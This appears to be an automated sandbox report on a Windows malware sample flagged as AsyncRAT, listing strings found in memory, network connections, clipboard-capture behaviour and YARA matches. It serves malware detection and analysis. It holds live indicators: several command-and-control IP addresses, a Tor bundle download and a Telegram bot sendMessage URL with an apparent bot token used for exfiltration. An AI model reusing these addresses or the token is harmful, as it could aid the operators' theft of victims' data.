Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.114.131.47:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.233.122.65:8000
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.39.242.18:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.110.140.182:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.88.59.12:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2137223275.0000000002D14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microfZ
Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: tor-real.exe, 00000019.00000002.4520803669.000000006C492000.00000008.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.000000000280B000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2106330524.0000000004EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://101.126.19.171:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.2106330524.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2139450627.0000000004841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBcq
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=68783
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://freehaven.net/anonbib/#hs-attack06
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000008.00000002.2139450627.0000000004996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip
Source: powershell.exe, 00000006.00000002.2111386860.0000000005DBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2150002147.00000000058AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9
Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2480334593.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2465033062.0000000003B53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004169000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4541756048.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004170000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warning
Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 0_2_00B5E2CC	0_2_00B5E2CC
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A94010	4_2_02A94010
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A98100	4_2_02A98100
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A9CB0E	4_2_02A9CB0E
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A939F8	4_2_02A939F8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A989D0	4_2_02A989D0
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A90FC8	4_2_02A90FC8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_02A97DB8	4_2_02A97DB8
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_06573F08	4_2_06573F08
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Code function: 4_2_065718B0	4_2_065718B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_033AB490	6_2_033AB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EFB490	8_2_02EFB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_02EFB470	8_2_02EFB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_087B3E98	8_2_087B3E98
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_0274E2CC	11_2_0274E2CC
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA730D	11_2_04CA730D
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA71DD	11_2_04CA71DD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA71BD	11_2_04CA71BD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA02C8	11_2_04CA02C8
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA02D8	11_2_04CA02D8
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA72E5	11_2_04CA72E5
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA739D	11_2_04CA739D
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CA73AD	11_2_04CA73AD
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Code function: 11_2_04CAEB90	11_2_04CAEB90
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_052CE2CC	19_2_052CE2CC
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_052C74A7	19_2_052C74A7
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_06290D20	19_2_06290D20
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_06290D0F	19_2_06290D0F
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09672941	19_2_09672941
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09675148	19_2_09675148
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09673157	19_2_09673157
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09674118	19_2_09674118
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096759B0	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09670040	19_2_09670040
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967B0E8	19_2_0967B0E8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679BE0	19_2_09679BE0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09677530	19_2_09677530
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096784C0	19_2_096784C0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679798	19_2_09679798
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679E80	19_2_09679E80
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09678968	19_2_09678968
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967513B	19_2_0967513B
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096759A0	19_2_096759A0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967904C	19_2_0967904C
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679058	19_2_09679058
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09670012	19_2_09670012
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679BD0	19_2_09679BD0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_0967AAE9	19_2_0967AAE9
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09674540	19_2_09674540
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09677520	19_2_09677520
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096784B0	19_2_096784B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_096737A8	19_2_096737A8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09673799	19_2_09673799
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 19_2_09679E70	19_2_09679E70
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 22_2_0290E2CC	22_2_0290E2CC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C074080	25_2_6C074080
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C061D20	25_2_6C061D20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C061D33	25_2_6C061D33
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C062142	25_2_6C062142
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06B998	25_2_6C06B998
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0751E0	25_2_6C0751E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C063A50	25_2_6C063A50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C069660	25_2_6C069660
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06C72B	25_2_6C06C72B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C06EB40	25_2_6C06EB40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C062F63	25_2_6C062F63
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EC83	25_2_6C09EC83
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BAD60	25_2_6C0BAD60
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09E838	25_2_6C09E838
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CEA50	25_2_6C0CEA50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EAA0	25_2_6C09EAA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0EEB20	25_2_6C0EEB20
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09EB43	25_2_6C09EB43
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DA647	25_2_6C0DA647
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09E040	25_2_6C09E040
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09C260	25_2_6C09C260
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E3CE0	25_2_6C0E3CE0
